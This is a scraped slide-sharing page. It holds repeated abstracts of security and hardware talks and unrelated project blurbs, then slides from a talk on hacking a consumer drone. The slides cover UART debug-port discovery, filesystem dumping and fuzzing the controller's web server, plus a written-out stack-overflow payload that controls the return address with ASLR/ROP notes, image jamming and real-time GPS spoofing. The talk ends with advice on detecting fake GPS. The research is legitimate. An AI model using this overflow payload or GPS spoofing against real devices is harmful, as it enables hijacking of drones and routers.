Codemotion Rome 2015 - Building a drone from scratch with spare parts is a challenging business. To accomplish this journey, a Linux embedded stability control system is developed entirely from 0.This is a journey starting from the hardware choosing (a home WIFI router), to a stable and real flight. Unconventional implementations are one of the main topic, like using WiFi as communication between drone and pilot, HTML5 and COMET to show telemetry from the router web server, and implementing a entirely new protocol based on 802.11 Beacon Frames to prevent deauthentication attacks.
True stories on the analysis of network activity using Pythondelimitry
The presentation from SPbPython community / PiterPy meetup.
The presentation tells about the problems of analysing the network activity of applications on Linux using Python. The following topics are covered: analysis of network packets, analysis of packet filters, packets crafting using Scapy, analysis of open ports.
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsWang Kang
Time and position data of mobile devices are trusted without checking by most vendors and developers. We discover a method of GPS spoofing with low-cost SDR devices. The method can be used to alter the location status as well as the time of affected devices, which poses a security threat to location-based services. We also examine other positioning methods used by smart devices (e.g. WiFi) and how to spoof them. Advices on preventing such spoofing are given.
Codemotion Rome 2015 - Building a drone from scratch with spare parts is a challenging business. To accomplish this journey, a Linux embedded stability control system is developed entirely from 0.This is a journey starting from the hardware choosing (a home WIFI router), to a stable and real flight. Unconventional implementations are one of the main topic, like using WiFi as communication between drone and pilot, HTML5 and COMET to show telemetry from the router web server, and implementing a entirely new protocol based on 802.11 Beacon Frames to prevent deauthentication attacks.
True stories on the analysis of network activity using Pythondelimitry
The presentation from SPbPython community / PiterPy meetup.
The presentation tells about the problems of analysing the network activity of applications on Linux using Python. The following topics are covered: analysis of network packets, analysis of packet filters, packets crafting using Scapy, analysis of open ports.
Black Hat Europe 2015 - Time and Position Spoofing with Open Source ProjectsWang Kang
Time and position data of mobile devices are trusted without checking by most vendors and developers. We discover a method of GPS spoofing with low-cost SDR devices. The method can be used to alter the location status as well as the time of affected devices, which poses a security threat to location-based services. We also examine other positioning methods used by smart devices (e.g. WiFi) and how to spoof them. Advices on preventing such spoofing are given.
Ken will explore the application of React and React Native to hardware projects, and the lessons learned while building a remotely controlled robotic crossbow.
Raspberry Pi is well known little Linux machine which almost everybody has. But, did you know that it can replace multiple programmers and enrich your hacking toolbox?
In this talk, we will take a look how to use Raspberry Pi (any model) to program any 3.3V target device from AVR micro-controllers, CPLD and FPGA devices and even CC110x which is available in IM-ME, nice little gadget useful for sub-1GHz radio spectrum analysis.
We will cover openocd, urjtag, avrdude and other projects which are useful if you want to run your own code on more of less any device.
Predicting and Abusing WPA2/802.11 Group Keysvanhoefm
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
Deep submicron-backdoors-ortega-syscan-2014-slidesortegaalfredo
Malicious hardware is a mature topic but previous research has focused almost exclusively on theoretical applications. In this article, practical implementations of gate-level backdoors will be presented using the Verilog hardware description language, then simulated and finally synthesized using freely available deep sub-micron (45-180 nm) standard cells, resulting in a backdoored latest-generation ARM CPU, suitable for fabrication and massive deployment.
A Drone Tale by Paolo Stagno - Hacktivity 2018Paolo Stagno
In 2013, DJI Drones quickly gained the reputation as the most stable platform for use in aerial photography and other fields. Since then Drones have increased their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on daily basis. As a result of that, Drones security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, Chipset, FPV system, GPS, App and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone product: the DJI Phantom 3. This model will be used to demonstrate each aspect of discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden the security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been shared before at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no fly zones abuses.
A Drone Tale by Paolo Stagno - Sec-T 2018Paolo Stagno
In 2013, DJI Drones quickly gained the reputation as the most stable platform for use in aerial photography and other fields. Since then Drones have increased their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on daily basis. As a result of that, Drones security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, Chipset, FPV system, GPS, App and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone product: the DJI Phantom 3. This model will be used to demonstrate each aspect of discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden the security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been shared before at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no fly zones abuses.
Embedded Recipes 2019 - Introduction to JTAG debuggingAnne Nicolas
This talk introduces JTAG debugging capabilities, both for debugging hardware and software. Marek first explains what the JTAG stands for and explains the operation of the JTAG state machine. This is followed by an introduction to free software JTAG tools, OpenOCD and urJTAG. Marek shortly explains how to debug software using those tools and how that ties into the JTAG state machine. However, JTAG was designed for testing hardware. Marek explains what boundary scan testing (BST) is, what are BSDL files and their format, and practically demonstrates how to blink an LED using BST and only free software tools.
Marek Vasut
Controlling the internet of things using wearable tech - Design+Code Day; Ara...ArabNet ME
Speaker: Simon Tadros, Backend Architect @conversionpoint
The workshop is an introduction to javascript and robotics. jhonny5 and cylonjs where the highlighted libraries.
The result was controlling the arduino via twitter and the wearable pebble watch.
NAP: mix and mingle Node-Arduino-Pebble
Hardware Stack: Arduino UNO, pebble watch, mobile phone, breadboard, wires, RGB led
Workshop outlines:
Introduction to arduino uno
Installing johnny-five library for node.js to program our nodebot and control the arduino
Introduction to pebble sdk and pebble.js
Installing cyclonjs node module to control pebble watch via javascript
Connecting to Twitter Stream API and push notifications to arduino rgb led
Control the notifications using the watch
Q & A
This presentation describes my experience with nRF24L01, Arduino, Bus Pirate and various other hardware toys when somebody who does software gets into contact with "real stuff".
Getting Started with Raspberry Pi - USC 2013Tom Paulus
The Raspberry Pi is a small credit-card sized linux computer. Developers and hobbyists around the world are creating miraculous applications and projects, and now you can join them. This presentation covers the first steps to using your Pi. From the basics, like burning your SD Card to creating a Weather Reporter. Discussing GPIO Basics and simple Python tools. Communication between other components using SPI or I2C is also covered.
Now that you have your shiny new Raspberry Pi, you may be asking yourself “what can I do with this thing?” Jonathan last spoke about making an emulation box to play all of your favorite classic games from yesteryear, but now he is back with a new project. Welcome to the Software-Defined Radio, one of the coolest devices to hit the market this decade. These often cheap USB gumsticks can pluck precious information right out of the frequencies floating around us for analysis. Join us for an adventure of pairing the amazing Raspberry Pi and the versatile Software-Defined Radio to ride the airwaves and decode data as if it came out of thin air.
Products Used:
RTL-SDR - https://amzn.to/2FYo3yh
HackRF One - https://amzn.to/32Xcyjv
PortaPack - https://amzn.to/3kCrSYG
Raspberry Pi 3B+ - https://amzn.to/33V4zTd
Video: https://www.youtube.com/watch?v=27_2RhtCKdA
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Ken will explore the application of React and React Native to hardware projects, and the lessons learned while building a remotely controlled robotic crossbow.
Raspberry Pi is well known little Linux machine which almost everybody has. But, did you know that it can replace multiple programmers and enrich your hacking toolbox?
In this talk, we will take a look how to use Raspberry Pi (any model) to program any 3.3V target device from AVR micro-controllers, CPLD and FPGA devices and even CC110x which is available in IM-ME, nice little gadget useful for sub-1GHz radio spectrum analysis.
We will cover openocd, urjtag, avrdude and other projects which are useful if you want to run your own code on more of less any device.
Predicting and Abusing WPA2/802.11 Group Keysvanhoefm
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
Deep submicron-backdoors-ortega-syscan-2014-slidesortegaalfredo
Malicious hardware is a mature topic but previous research has focused almost exclusively on theoretical applications. In this article, practical implementations of gate-level backdoors will be presented using the Verilog hardware description language, then simulated and finally synthesized using freely available deep sub-micron (45-180 nm) standard cells, resulting in a backdoored latest-generation ARM CPU, suitable for fabrication and massive deployment.
A Drone Tale by Paolo Stagno - Hacktivity 2018Paolo Stagno
In 2013, DJI Drones quickly gained the reputation as the most stable platform for use in aerial photography and other fields. Since then Drones have increased their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on daily basis. As a result of that, Drones security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, Chipset, FPV system, GPS, App and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone product: the DJI Phantom 3. This model will be used to demonstrate each aspect of discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden the security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been shared before at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no fly zones abuses.
A Drone Tale by Paolo Stagno - Sec-T 2018Paolo Stagno
In 2013, DJI Drones quickly gained the reputation as the most stable platform for use in aerial photography and other fields. Since then Drones have increased their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on daily basis. As a result of that, Drones security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, Chipset, FPV system, GPS, App and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone product: the DJI Phantom 3. This model will be used to demonstrate each aspect of discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden the security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been shared before at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no fly zones abuses.
Embedded Recipes 2019 - Introduction to JTAG debuggingAnne Nicolas
This talk introduces JTAG debugging capabilities, both for debugging hardware and software. Marek first explains what the JTAG stands for and explains the operation of the JTAG state machine. This is followed by an introduction to free software JTAG tools, OpenOCD and urJTAG. Marek shortly explains how to debug software using those tools and how that ties into the JTAG state machine. However, JTAG was designed for testing hardware. Marek explains what boundary scan testing (BST) is, what are BSDL files and their format, and practically demonstrates how to blink an LED using BST and only free software tools.
Marek Vasut
Controlling the internet of things using wearable tech - Design+Code Day; Ara...ArabNet ME
Speaker: Simon Tadros, Backend Architect @conversionpoint
The workshop is an introduction to javascript and robotics. jhonny5 and cylonjs where the highlighted libraries.
The result was controlling the arduino via twitter and the wearable pebble watch.
NAP: mix and mingle Node-Arduino-Pebble
Hardware Stack: Arduino UNO, pebble watch, mobile phone, breadboard, wires, RGB led
Workshop outlines:
Introduction to arduino uno
Installing johnny-five library for node.js to program our nodebot and control the arduino
Introduction to pebble sdk and pebble.js
Installing cyclonjs node module to control pebble watch via javascript
Connecting to Twitter Stream API and push notifications to arduino rgb led
Control the notifications using the watch
Q & A
This presentation describes my experience with nRF24L01, Arduino, Bus Pirate and various other hardware toys when somebody who does software gets into contact with "real stuff".
Getting Started with Raspberry Pi - USC 2013Tom Paulus
The Raspberry Pi is a small credit-card sized linux computer. Developers and hobbyists around the world are creating miraculous applications and projects, and now you can join them. This presentation covers the first steps to using your Pi. From the basics, like burning your SD Card to creating a Weather Reporter. Discussing GPIO Basics and simple Python tools. Communication between other components using SPI or I2C is also covered.
Now that you have your shiny new Raspberry Pi, you may be asking yourself “what can I do with this thing?” Jonathan last spoke about making an emulation box to play all of your favorite classic games from yesteryear, but now he is back with a new project. Welcome to the Software-Defined Radio, one of the coolest devices to hit the market this decade. These often cheap USB gumsticks can pluck precious information right out of the frequencies floating around us for analysis. Join us for an adventure of pairing the amazing Raspberry Pi and the versatile Software-Defined Radio to ride the airwaves and decode data as if it came out of thin air.
Products Used:
RTL-SDR - https://amzn.to/2FYo3yh
HackRF One - https://amzn.to/32Xcyjv
PortaPack - https://amzn.to/3kCrSYG
Raspberry Pi 3B+ - https://amzn.to/33V4zTd
Video: https://www.youtube.com/watch?v=27_2RhtCKdA
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Introduction to Software Defined Radio (SDR) on LinuxPamela O'Shea
An introduction to software defined radio on Linux by Pamela O'Shea. Presented March 31st 2016 at Cyberspectrum Melbourne.
http://www.meetup.com/Cyberspectrum-Melbourne/ @pamoshea
@sdr_melbourne
OSINT RF Reverse Engineering by Marc NewlinEC-Council
IoT devices frequently include obscure RF transceivers with little or no documentation, which can hinder the reverse engineering research process. Fortunately, regulatory bodies like the United States’ FCC contain a wealth of useful information.
In order to certify wireless devices for sale in different markets, manufacturers must submit their products to test labs which evaluate the behavior of their RF emissions. The test reports often contain detailed physical layer operating characteristics, including RF channels, modulation, and frequency hopping behavior.
By translating regulatory test reports into GNU Radio flow graphs, a researcher is able to focus their efforts on understanding packet formats and protocol behavior instead of grinding away at the physical layer. In this talk, I will discuss the techniques I used while researching the MouseJack vulnerabilities, which allowed me to expedite the process of evaluating a large number of vulnerable devices.
Talk Outline
Overview of various regulatory bodies (FCC, KCC/MSIP, IC, etc), and the data they make publicly available
Discussion of the official and third party tools to query regulatory bodies for specific device information
Using internal device photos from regulatory bodies to identify transceiver part numbers
Using test reports to identify physical layer operating characteristics
Building a GNU Radio flow graph based on information gathered from regulatory test reports or transceiver spec sheets
Sniffing device traffic, inferring operating behavior, and building out a model of the device communication protocol
How TCP/IP attacks can be applied in satellite communications. Interesting example on how to achieve anonymous Internet connection using DVB and some tricks. Presented in
Network Scanning Phases and Supporting ToolsJoseph Bugeja
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
"Costruiamo un Rover in 60 minuti" by Marco Dal Pino, Marco Minerva.
Si fa presto a dire IoT! In una sessione tutta codice, cacciavite e componenti vediamo come costruire un rover che possa muoversi in uno spazio sconosciuto evitando gli ostacoli e permettendo di rilevare parametri ambientali. Utilizzeremo tutte le principali tecnologie di prototipazione rapida ed interfacciamento dei sensori per costruire il nostro piccolo robot.
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
GRX is the global private network where telecom network operators exchange GPRS roaming traffic of their users. It’s also used for all M2M networks where roaming is used, and that is the case from some company’s truck fleet management system down to intelligence GPS location spybug tracking system.
GPRS has been there from 2.5G GSM networks to the upcoming LTE Advanced networks, and is now quite widespread technology, along with its attacks. GRX has had a structuring role in the global telecom world at a time where IP dominance was beginning to be acknowledged. Now it has expanded to a lightweight structure using both IP technologies and ITU-originated protocols.
In this presentation, we’ll see how this infrastructure is protected and how it can be attacked. We’ll discover the issues with specific telco equipment inside GRX, namely GGSN and SGSN but also now PDN Gateways in LTE and LTE Advanced “Evolved Packet Core”. We will see the implications of this with GTP protocol, DNS infrastructure, AAA servers and core network technologies such as MPLS, IPsec VPNs and their associated routing protocols. These network elements were rarely evaluated for security, and during our engagements with vulnerability analysis, we’ve seen several vulnerabilities that we will be showing in this speech.
We will demo some of the attacks on a simulated “PS Domain” network, that it the IP part of the Telecom Core Network that transports customers’ traffic, and investigate its relationships with legacy SS7, SIGTRAN IP backbones, M2M private corporate VPNs and telecom billing systems. We will also seem how automation enable us to succeed at attacks which are hard to perform and will show how a “sentinel” attack was able to compromise a telecom Core Network during one penetration test.
Protocol T50: Five months later... So what?Nelson Brito
T50 (an Experimental Mixed Packet Injector) new features added to version 5.3 (Chaos Maker).
Check the original demonstration videos:
- https://www.youtube.com/playlist?list=PLda9TmFadx_m2qdd-euUf4zhQ-5juTVEx
For further source codes, please, refer to:
- http://t50.sourceforge.net/
Slides from my talk at DevFest Prague 2017 about few thoughts on a topic of "When a robot is smart enough" with examples how you can build one at home from Open Hardware components.
Ideas were demonstrated on a showcase of my #Probee smart robotic car build using #Arduino and #RaspberryPi.
All code is open source at https://github.com/Juicymo/iot-probee
Link to event: https://2017.devfest.cz/schedule/day1?sessionId=123
Talk was presented on 2017/11/04
#DevFestCZ #Probee
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom KimHITCON GIRLS
2017年12月10日 - Birds of a Feather ( 簡稱BoF ),語意上是指鳥類會與相同類型的鳥群一起飛翔,之後衍伸為讓志同道合的人們聚集在一起或舉辦非正式聚會。
https://hitcon-girls.blogspot.tw/2017/12/Birds-of-a-Feather.html
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardHITCON GIRLS
2017年12月10日 - Birds of a Feather ( 簡稱BoF ),語意上是指鳥類會與相同類型的鳥群一起飛翔,之後衍伸為讓志同道合的人們聚集在一起或舉辦非正式聚會。
https://hitcon-girls.blogspot.tw/2017/12/Birds-of-a-Feather.html
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)MdTanvirMahtab2
This presentation is about the working procedure of Shahjalal Fertilizer Company Limited (SFCL). A Govt. owned Company of Bangladesh Chemical Industries Corporation under Ministry of Industries.
Student information management system project report ii.pdfKamal Acharya
Our project explains about the student management. This project mainly explains the various actions related to student details. This project shows some ease in adding, editing and deleting the student details. It also provides a less time consuming process for viewing, adding, editing and deleting the marks of the students.
Cosmetic shop management system project report.pdfKamal Acharya
Buying new cosmetic products is difficult. It can even be scary for those who have sensitive skin and are prone to skin trouble. The information needed to alleviate this problem is on the back of each product, but it's thought to interpret those ingredient lists unless you have a background in chemistry.
Instead of buying and hoping for the best, we can use data science to help us predict which products may be good fits for us. It includes various function programs to do the above mentioned tasks.
Data file handling has been effectively used in the program.
The automated cosmetic shop management system should deal with the automation of general workflow and administration process of the shop. The main processes of the system focus on customer's request where the system is able to search the most appropriate products and deliver it to the customers. It should help the employees to quickly identify the list of cosmetic product that have reached the minimum quantity and also keep a track of expired date for each cosmetic product. It should help the employees to find the rack number in which the product is placed.It is also Faster and more efficient way.
10. Sniff traffics - SDR
• Software-Defined Radio
– Generate any radio protocol if device support that frequency
– Writing Modulation / Demodulation program by yourself
– Simply inspect the radio spectrum
11. How to hacking? (After disassemble)
• Identify chipsets
• Find out the debug port
– UART
– SWD
– JTAG
• Dump the flash rom
– Bus Pirate
• Analysis the signal
– Logic Analyzer
23. Find out debug port – part 5
• Analysis the signal with Logic Analyzer
– GND-GND
24. Find out debug port – part 6
• Analysis the signal with Logic Analyzer
25. Find out debug port – part 7
• Analysis the signal with Logic Analyzer
– Calculate the baudrate
– 1/0.00001725 ~= 57971
– General baudrate:
300,1200,2400,4800,9600,14400,19200,28800,38400,57600,115200
26. Find out debug port – part 8
• Analysis the signal with Logic Analyzer
– Decode with Async Serial
– Baudrate 57600
27. Find out debug port – part 9
• Analysis the signal with Logic Analyzer
– Finally decode the signal
28. Find out debug port – part 10
• Analysis the signal with Logic Analyzer
– Finally we know…
29. Find out debug port – part 11
• Connect to USBTTL
– GND-GND
– TXD-RXD
– RXD-TXD
30. Find out debug port – part 12
• Finally we got the Putty shell
31. Key mapping is wrong?
• 0x13 -> v
• 0x14 -> ?
• 0x15 -> u
• 0x16 -> ?
• 0x17 -> t
• I follow this strange rule to write the decoder
char asciitable[] = " !"#$%&'()*+,-
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~";
for (int i=0;i<sizeof(asciitable)-1;i++)
{
if (tmpchr == asciitable[i])
{
tmpinput[inputpos++] = 0x03+(sizeof(asciitable)-2-i)*2;
}
}
33. Just because RXD did not weld well
Just because RXD did not weld well
Just because RXD did not weld well
34. Pick up the filesystem
• tar -zcvf /www/fs.tar.gz /
35. Find the vulnerability – part 1
• Fuzzing the website
– httpClient.request("POST","/login.html","a"*(30000)
• /usr/sbin/httpd will crash
36. Find the vulnerability – part 2
• Upload gdbserver (mips version) for remote debugging
– /usr/sbin/httpd; ./gdbserver --attach 0.0.0.0:5555 `pidof httpd`
37. Find the vulnerability – part 3
• Stack overflow
• Finally located the crash function
– /usr/sbin/httpd 0x0040D44C
• If stack is incorrect it will crash before control the ra(ip)
• So need to dump original stack to fix
– dump memory stack.bin $sp $sp+26000
• ASLR is enabled
– # cat /proc/sys/kernel/randomize_va_space
– 1
38. Find the vulnerability – part 4
• Control the ra (ip)
origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00“
s0 = "x41x41x41x41"
s1 = "x00x00x54x00"
s2 = "x43x43x43x43"
s3 = "x44x44x44x44"
s4 = "x8Cx8Ex4Fx00"
s5 = "x46x46x46x46"
s6 = "x60xE2x53x00"
s7 = "x04x00x00x00"
s8 = "x49x49x49x49"
ra = "x78x56x34x12“
• httpClient.request("POST","/login.html","a"*(25262)+origstac
k+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra)
aaaa..(25262 bytes)
Original Stack
Variables(48 bytes)
Register S0~S8
(36 bytes)
Return Address
(0x12345678)
39. Find the vulnerability – part 5
• Bypass the ASLR
– 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO
and heap are randomized.
– Find rop chain on self program
42. What is SDR
• Software-Defined Radio
– Generate any radio protocol if device support that frequency
– Writing Modulation / Demodulation program by yourself
– Simply inspect the radio spectrum
43. SDR Tools
• HackRF tools
• Gqrx - Display the spectrum waterfall
• GNURadio – GUI tool for modulation/demodulation
• OpenBTS – open source tool for building GSM Station
• Artemis – Identify protocol
• Baudline – for analysis the I/Q data
53. RC to Drone radio spectrum (FHSS)
• Control drone direction (up down left right)
• Frequency 2.400~2.483GHz, each channel about 1MHz
54. DSSS - Drone to RC radio spectrum
• For drone to remote controller image transmission
• Frequency 2.4015~2.4815 GHz
• split into 6 channels, each channel is about 10MHz
55. Finally we found…
• Images have no checksum mechanism, so we can
jamming the radio frequency to show wrong image to
controller
59. Which function is associate with GPS?
• No-fly zone
• Return to home
• Follow me
• Waypoint
60. How to spoof the GPS location?
• Use the SDR
• There have a good open-source GPS simulator in GitHub,
called gps-sdr-sim, but it have some limitation, before you
want fake a location, should wait for few minutes to generate
the I/Q data
• So we improve the code, let it can in real-time generate GPS
signal and can be controlled with the joystick.
65. How to detect the fake GPS signal?
• You need a GPS module to debug GPS signals.
– U-blox M8N
66. How to detect the fake GPS signal?
• Validate the time between satellite time and real time
67. How to detect the fake GPS signal?
• Check the motion speed between point to point
– For example it is impossible to change your location from Taiwan to
Serbia in one second
68. How to detect the fake GPS signal?
• Validate the GPS sub-frame data
78. Conclusion
• IoT threats come from multi-dimensional
– In addition to traditional IP network protocols, there are various types
of radio protocols
• Be careful CAN-BUS network with in-car wireless device
• Comprehensive protection strategy is needed